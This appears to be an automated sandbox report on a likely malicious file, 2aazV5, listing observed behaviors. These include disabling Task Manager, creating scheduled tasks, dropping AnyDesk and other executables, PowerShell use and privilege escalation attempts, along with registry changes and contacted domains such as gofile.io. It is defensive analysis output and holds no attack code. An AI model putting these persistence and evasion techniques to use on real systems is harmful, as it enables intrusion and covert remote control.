Analysis Overview
SHA256: 1b430104a880becb0f207ac55e822b4400e76aa0b833c99a84bd154a08ea2614
Threat Level: Likely malicious
The file 2aazV5 was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Possible privilege escalation attempt
Disables Task Manager via registry modification
Checks computer location settings
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
Checks installed software on the system
Drops file in System32 directory
Enumerates physical storage devices
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Modifies registry class
Delays execution with timeout.exe
Suspicious use of FindShellTrayWindow
NTFS ADS
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious behavior: GetForegroundWindowSpam
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Creates scheduled task(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Modifies registry key
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported: 2024-06-07 19:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-06-07 19:04
Reported: 2024-06-07 19:11
Platform: win7-20240221-en
Max time kernel: 119s
Max time network: 134s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0c6c1410eb9da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fc10080bd9b9e84b9149f7c8d67178a30000000002000000000010660000000100002000000016db8f607b75a14c6762b2f930eef232ad82d8762635c037f22c2eea851b96b1000000000e80000000020000200000000f03e7431191ac07765d4b1bb4b8c685223226506e90721d067f0c0ddfe4711090000000cff8ed6e599ec18735e0a7ce91eac0f5c777cf9ef94668f0c4393a7f15ff48979be904aa535ae06a03aac7a9be5093bc502ff2c330dcaabc51c4d0f752e633878f5b58cfdfee0f527d6c7b6b243a4d450decf379bdabd3aed1408770f5327e795ec1aa62eb8d4ed3c0edc7badce8a1a4d739380f3497ff034988613080c557d44c774c1601ab3990fa1f0637a86449cb40000000a3423898c0a79dd70585876460aad54fb58627c72d3a9b1e375436f4918d0f5b9e01a702b0a2db196e309b8c1682198b367e869a400968d420be811f0cb8dcf9 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fc10080bd9b9e84b9149f7c8d67178a300000000020000000000106600000001000020000000b97e2f2883d5731a1d2d367a36dee1640f0088d5079b1629f20798a31100a039000000000e80000000020000200000008b8b4fa25241490cb78bf19ea6573f263699299330b679fa45cdd2452423d90220000000ae07009c85c6cffb108bf3f3e353dff357539a41118da20716a4f0e2c704fafe40000000fec3ce645c337574c6d7362d1e0854d82e09d05bfb999b19b57930cf823466c23d3b64253e8fb1630be12c26250cb65f3e42e29090fa2fc7bfa597f38c116b30 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423949234" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{748401D1-2501-11EF-8859-DE62917EBCA6} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2224 wrote to memory of 2900 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2224 wrote to memory of 2900 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2224 wrote to memory of 2900 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2224 wrote to memory of 2900 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\2aazV5.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2224 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 8.8.8.8:53 | counter.yadro.ru | udp |
| RU | 88.212.201.198:443 | counter.yadro.ru | tcp |
| RU | 88.212.201.198:443 | counter.yadro.ru | tcp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 151.80.29.83:443 | gofile.io | tcp |
| FR | 151.80.29.83:443 | gofile.io | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab9916.tmp
C:\Users\Admin\AppData\Local\Temp\Tar9C0A.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F59A01A8B782D93EA6991BC172CEFFB1
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F59A01A8B782D93EA6991BC172CEFFB1
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\favicon[1].htm
Analysis: behavioral2
Detonation Overview
Submitted: 2024-06-07 19:04
Reported: 2024-06-07 19:11
Platform: win10v2004-20240426-en
Max time kernel: 139s
Max time network: 140s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Possible privilege escalation attempt
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\doorbell-upd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\doorbell-upd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\ProgramData\stn.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Modifies file permissions
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | C:\ProgramData\Anydesk.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Anydesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Anydesk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\ProgramData\Anydesk.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3571316656-3665257725-2415531812-1000\{76172F75-B16B-4370-BCC9-297E6D3A996C} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 493133.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
